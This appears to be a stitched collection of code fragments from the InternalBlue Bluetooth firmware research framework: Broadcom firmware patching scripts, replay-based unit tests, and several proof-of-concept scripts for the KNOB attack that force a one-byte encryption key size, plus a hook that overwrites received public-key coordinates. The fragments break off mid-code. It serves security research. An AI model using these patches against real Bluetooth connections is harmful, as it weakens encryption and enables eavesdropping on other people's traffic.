#!/usr/bin/python2 from pwn import * from internalblue.adbcore import ADBCore from internalblue.bluezcore import BluezCore """ Script that shows receive statistics from LE connections over HCI on the CYW20735B1 evaluation board. Generated with Nexmon. """ internalblue = ADBCore() try: internalblue.interface = internalblue.device_list()[0][ 1] # just use the first Android device except IndexError: internalblue = BluezCore() try: internalblue.interface = internalblue.device_list()[0][ 1] # ...or the first local HCI interface except IndexError: log.critical( "Adapt the Python script to use an available Broadcom Bluetooth interface." ) exit(-1) # setup sockets if not internalblue.connect(): log.critical("No connection to target device.") exit(-1) progress_log = log.info("Connected to first target, installing patches...")
#!/usr/bin/env python3 # Jiska Classen # Get receive statistics on a Samsung Galaxy S8 for BLE connection events import sys from argparse import Namespace from pwnlib.asm import asm import internalblue.hci as hci from internalblue.adbcore import ADBCore from internalblue.cli import InternalBlueCLI from internalblue.utils.packing import u8, u16 internalblue = ADBCore(serial=True) device_list = internalblue.device_list() if len(device_list) == 0: internalblue.logger.warn("No HCI devices connected!") exit(-1) internalblue.interface = device_list[0][1] # just use the first device """ # _connTaskRxDone has a Patchram position, S8 fixed almost everything in BLE, because # they had to for Bluetooth 5 compliance. # The base address is 0x5E324, and this will jump into the Patchram. # You need to adjust the RX_DONE_HOOK_ADDRESS in the beginning. """ # RX_DONE_HOOK_ADDRESS = 0x1344D0 # on S8 with Patchlevel May 1 2019 on stock ROM # RX_DONE_HOOK_ADDRESS = 0x134500 # on S8 with Lineage OS Nightly from August 30 2019 RX_DONE_HOOK_ADDRESS = 0x134514 # on S8 with Patchlevel September 1 2019 on stock ROM HOOKS_LOCATION = 0x210500
// action performed if nothing in the list matched... // this one does a lmp_not_accepted, works for us to prevent parsing all_macs_invalid: // assume we have an lmp error that we can handle ourselves... mov r4, r0 b 0x3f46c whitelist: .byte 0x%02x //length //mac address list %s """ % (len(WHITELIST), ''.join([".byte 0x%02x\n" % x for x in WHITELIST_BYTES])) internalblue = ADBCore() internalblue.interface = internalblue.device_list()[0][ 1] # just use the first device # setup sockets if not internalblue.connect(): log.critical("No connection to target device.") exit(-1) progress_log = log.info("Writing ASM snippet for LMP MAC address filter.") code = asm(ASM_SNIPPET_LMP_FILTER, vma=ASM_LOCATION_LMP_FILTER) if not internalblue.writeMem( address=ASM_LOCATION_LMP_FILTER, data=code, progress_log=progress_log): progress_log.critical("error!") exit(-1)
from internalblue import Address, hci from internalblue.adbcore import ADBCore from internalblue.cli import InternalBlueCLI, auto_int from internalblue.utils.packing import p16, u16 """ This is a standalone PoC for the KNOB attack on a Samsung Galaxy S8. Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB. For details see https://github.com/francozappa/knob This PoC is much shorter since it only modifies global variables for key entropy. """ internalblue = ADBCore(serial=True) internalblue.interface = internalblue.device_list()[0][ 1] # just use the first device # setup sockets if not internalblue.connect(): internalblue.logger.critical("No connection to target device.") exit(-1) internalblue.logger.info( "Installing patch which ensures that send_LMP_encryption_key_size_req is always len=1!" ) # modify function lm_SendLmpEncryptKeySizeReq patch = asm("mov r2, #0x1", vma=0x530F6) # connection struct key entropy internalblue.patchRom(Address(0x530F6), patch)
import internalblue.hci as hci from internalblue.cmds import auto_int """ This is a standalone PoC for the KNOB attack on a Nexus 6P. Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB. For details see https://github.com/francozappa/knob This PoC is much shorter since it only modifies global variables for key entropy. """ internalblue = ADBCore(serial=False) # without custom bluetooth.default.so, change to True internalblue.interface = internalblue.device_list()[0][1] # just use the first device # setup sockets if not internalblue.connect(): log.critical("No connection to target device.") exit(-1) log.info("Installing patch which ensures that send_LMP_encryption_key_size_req is always len=1!") # modify function lm_SendLmpEncryptKeySizeReq #patch = asm("mov r2, #0x1", vma=0x4BC6E) # connection struct key entropy #internalblue.patchRom(0x4BC6E, patch) # this somehow crashes on the Nexus 6P, but the global variable seems to be sufficient :)
# Jiska Classen, Secure Mobile Networking Lab from pwn import * from internalblue.adbcore import ADBCore """ This is a standalone PoC for the KNOB attack on a Samsung Galaxy S8. Original LMP monitor mode was from Dennis Mantz, and was then modified by Daniele Antonioli for KNOB. For details see https://github.com/francozappa/knob This PoC is much shorter since it only modifies global variables for key entropy. """ internalblue = ADBCore(serial=True) internalblue.interface = internalblue.device_list()[0][ 1] # just use the first device # setup sockets if not internalblue.connect(): log.critical("No connection to target device.") exit(-1) log.info( "Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!" ) # modify function lm_SendLmpEncryptKeySizeReq patch = asm("mov r2, #0x1", vma=0x530F6) # connection struct key entropy internalblue.patchRom(0x530F6, patch)
// append buffer with "RAND" add r0, 10 // buffer starts at 10 with data ldr r1, =0x444e4152 // RAND str r1, [r0] add r0, 4 // advance buffer by 4 // send hci event mov r0, r4 // back to buffer at offset 0 bl 0xE418 // bthci_event_AttemptToEnqueueEventToTransport pop {r0-r4, pc} """ % (MEM_ROUNDS, MEM_RNG, PRAND) internalblue = ADBCore(log_level='info', serial=True) internalblue.interface = internalblue.device_list()[0][ 1] # just use the first device # setup sockets if not internalblue.connect(): internalblue.logger.critical("No connection to target device.") exit(-1) internalblue.logger.info("installing assembly patches...") # Install the RNG code in RAM code = asm(ASM_SNIPPET_RNG, vma=ASM_LOCATION_RNG) if not internalblue.writeMem( address=ASM_LOCATION_RNG, data=code, progress_log=None): internalblue.logger.critical("error!")
def test_info_queue(): dummy = [ QueueElement(0, 2123152, 4, 16, 0, 16, 2123208, 2123272, 2123268, 2123268, 0, 0, 2123332, 2141676, 'tran_HCIEvent'), QueueElement(1, 2123332, 8, 31, 0, 31, 2123388, 2123636, 2123436, 2123436, 0, 0, 2123636, 2123152, 'tran_ACLData'), QueueElement(2, 2123636, 4, 3, 0, 3, 2123692, 2123704, 2123692, 2123692, 0, 0, 2123704, 2123332, 'tran_SCOData'), QueueElement(3, 2123704, 4, 31, 0, 31, 2123760, 2123884, 2123760, 2123760, 0, 0, 2123884, 2123636, 'tran_UartBridgeNonHCIEvent'), QueueElement(4, 2123884, 4, 20, 0, 20, 2123940, 2124020, 2124000, 2124000, 0, 0, 2124020, 2123704, 'tran_DiagData'), QueueElement(5, 2124020, 8, 8, 0, 8, 2124076, 2124140, 2124076, 2124076, 0, 0, 2124140, 2123884, 'tran_HIDUsbKBEvt'), QueueElement(6, 2124140, 8, 6, 0, 6, 2124196, 2124244, 2124196, 2124196, 0, 0, 2124244, 2124020, 'tran_HIDUsbMSEvt'), QueueElement(7, 2124244, 8, 1, 0, 1, 2100496, 2100504, 2100496, 2100496, 0, 0, 2124300, 2124140, 'tran_HIDUsbMSCtrl'), QueueElement(8, 2124300, 8, 1, 0, 1, 2100504, 2100512, 2100504, 2100504, 0, 0, 2124356, 2124244, 'tran_HIDUsbKBCtrl'), QueueElement(9, 2124356, 8, 32, 0, 32, 2124412, 2124668, 2124412, 2124412, 0, 0, 2110352, 2124300, 'tran_HidAuxData'), QueueElement(10, 2110352, 8, 12, 0, 12, 2192284, 2192380, 2192300, 2192300, 0, 0, 2120560, 2124356, 'lm_Cmd'), QueueElement(11, 2120560, 4, 8, 0, 8, 2192380, 2192412, 2192400, 2192400, 0, 0, 2110408, 2110352, 'hci_HciCommand'), QueueElement(12, 2110408, 8, 19, 0, 19, 2192412, 2192564, 2192412, 2192412, 0, 0, 2118068, 2120560, 'lm_deferredAction'), QueueElement(13, 2118068, 8, 6, 0, 6, 2192564, 2192612, 2192564, 2192564, 0, 0, 2141588, 2110408, 'lrmmsm_cmd'), QueueElement(14, 2141588, 4, 8, 0, 8, 2141644, 2141676, 2141644, 2141644, 0, 0, 2141676, 2118068, 'liteHostEvent'), QueueElement(15, 2141676, 4, 16, 0, 16, 2141732, 2141796, 2141732, 2141732, 0, 0, 2123152, 2141588, 'litehostRcvdL2capData') ] trace = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'traces/adbcore/dictionary_tests/info_queue.trace') args = _parse_argv('') args.device = 'adb_replay' args.replay = trace data_directory = os.path.expanduser('~') + '/.internalblue' if not os.path.exists(data_directory): os.mkdir(data_directory) from internalblue.socket_hooks import hook, ReplaySocket hook(ADBCore, ReplaySocket, filename=args.replay) connection_methods = [ ADBCore(log_level='info', data_directory=data_directory, replay=True) ] devices = [] # type: List[DeviceTuple] devices = connection_methods[0].device_list() device = devices[0] reference = device[0] reference.interface = device[1] reference.connect() information = reference.readQueueInformation() print(information) nose.tools.assert_equal([vars(element) for element in information], [vars(element) for element in dummy]) reference.shutdown()
#!/usr/bin/env python2 # Dennis Mantz from internalblue import Address from internalblue.adbcore import ADBCore from internalblue.utils.pwnlib_wrapper import log, asm #internalblue = core.InternalBlue() internalblue = ADBCore() device_list = internalblue.device_list() if len(device_list) == 0: log.warn("No ADB devices connected!") exit(-1) internalblue.interface = device_list[0][1] # just use the first device PK_RECV_HOOK_ADDRESS = Address(0x2FED8) PK_SEND_HOOK_ADDRESS = Address(0x030098) GEN_PRIV_KEY_ADDRESS = Address(0x48eba) HOOKS_LOCATION = 0xd7800 ASM_HOOKS = """ b pk_recv_hook b pk_send_hook b gen_priv_key // overwrite y-coordinate of received PK point pk_recv_hook: push {r0-r3,lr} strb.w r0, [r4, 170] ldr r0, =0x205614 mov r1, 6 mov r2, 0
def test_info_heap_old(): dummy = [{ 'index': 0, 'buffer_headers': { 2194080: 0, 2193828: 2121160, 2193864: 2194008, 2193900: 2194044, 2193936: 2193864, 2193972: 2121160, 2194008: 2193900, 2194044: 2194080 }, 'capacity': 8, 'address': 2121160, 'next': 2121208, 'memory_size': 288, 'waitlist_length': 0, 'buffer_list': 2193828, 'memory': 2193828, 'buffer_size': 32, 'prev': 2157672, 'list_length': 7, 'thread_waitlist': 0 }, { 'index': 1, 'buffer_headers': { 2194592: 0, 2194116: 2194184, 2194184: 2194252, 2194252: 2194320, 2194320: 2194388, 2194388: 2194456, 2194456: 2194524, 2194524: 2194592 }, 'capacity': 8, 'address': 2121208, 'next': 2121256, 'memory_size': 544, 'waitlist_length': 0, 'buffer_list': 2194184, 'memory': 2194116, 'buffer_size': 64, 'prev': 2121160, 'list_length': 7, 'thread_waitlist': 0 }, { 'index': 2, 'buffer_headers': { 2196000: 2196268, 2197072: 0, 2194660: 2194928, 2195464: 2195732, 2196268: 2196536, 2194928: 2195196, 2195732: 2196000, 2196536: 2196804, 2196804: 2197072, 2195196: 2195464 }, 'capacity': 10, 'address': 2121256, 'next': 2121352, 'memory_size': 2680, 'waitlist_length': 0, 'buffer_list': 2194660, 'memory': 2194660, 'buffer_size': 264, 'prev': 2121208, 'list_length': 10, 'thread_waitlist': 0 }, { 'index': 3, 'buffer_headers': { 2214480: 2215548, 2215548: 2216616, 2216616: 0, 2213412: 2214480 }, 'capacity': 4, 'address': 2121352, 'next': 2121304, 'memory_size': 4272, 'waitlist_length': 0, 'buffer_list': 2213412, 'memory': 2213412, 'buffer_size': 1064, 'prev': 2121256, 'list_length': 4, 'thread_waitlist': 0 }, { 'index': 4, 'buffer_headers': { 2234124: 0, 2231932: 2233028, 2224260: 2225356, 2219876: 2220972, 2226452: 2227548, 2223164: 2224260, 2228644: 2229740, 2220972: 2222068, 2225356: 2226452, 2230836: 2231932, 2233028: 2234124, 2222068: 2223164, 2227548: 2228644, 2217684: 2218780, 2218780: 2219876, 2229740: 2230836 }, 'capacity': 16, 'address': 2121304, 'next': 2157624, 'memory_size': 17536, 'waitlist_length': 0, 'buffer_list': 2217684, 'memory': 2217684, 'buffer_size': 1092, 'prev': 2121352, 'list_length': 16, 'thread_waitlist': 0 }, { 'index': 5, 'buffer_headers': { 2235264: 2235308, 2235616: 2235660, 2235396: 2235440, 2235528: 2235572, 2235660: 2235704, 2235308: 2235352, 2235440: 2235484, 2235704: 2235748, 2235792: 2235836, 2235220: 2235264, 2235748: 2235792, 2235352: 2235396, 2235572: 2235616, 2235836: 0, 2235484: 2235528 }, 'capacity': 15, 'address': 2157624, 'next': 2157672, 'memory_size': 660, 'waitlist_length': 0, 'buffer_list': 2235220, 'memory': 2235220, 'buffer_size': 40, 'prev': 2121304, 'list_length': 15, 'thread_waitlist': 0 }, { 'index': 6, 'buffer_headers': { 2236096: 2236132, 2236240: 2236276, 2236132: 2236168, 2236384: 0, 2235880: 2235916, 2236204: 2236240, 2236348: 2236384, 2235916: 2235952, 2235952: 2235988, 2236168: 2236204, 2236312: 2236348, 2235988: 2236024, 2236024: 2236060, 2236276: 2236312, 2236060: 2236096 }, 'capacity': 15, 'address': 2157672, 'next': 2121160, 'memory_size': 540, 'waitlist_length': 0, 'buffer_list': 2235880, 'memory': 2235880, 'buffer_size': 32, 'prev': 2157624, 'list_length': 15, 'thread_waitlist': 0 }] trace = os.path.join( os.path.dirname(os.path.abspath(__file__)), 'traces/adbcore/dictionary_tests/info_heap_old.trace') args = _parse_argv('') args.device = 'adb_replay' args.replay = trace data_directory = os.path.expanduser('~') + '/.internalblue' if not os.path.exists(data_directory): os.mkdir(data_directory) from internalblue.socket_hooks import hook, ReplaySocket hook(ADBCore, ReplaySocket, filename=args.replay) connection_methods = [ ADBCore(log_level='info', data_directory=data_directory, replay=True) ] devices = [] # type: List[DeviceTuple] devices = connection_methods[0].device_list() device = devices[0] reference = device[0] reference.interface = device[1] reference.connect() information = reference.readHeapInformation() print(information) nose.tools.assert_equal(information, dummy) reference.shutdown()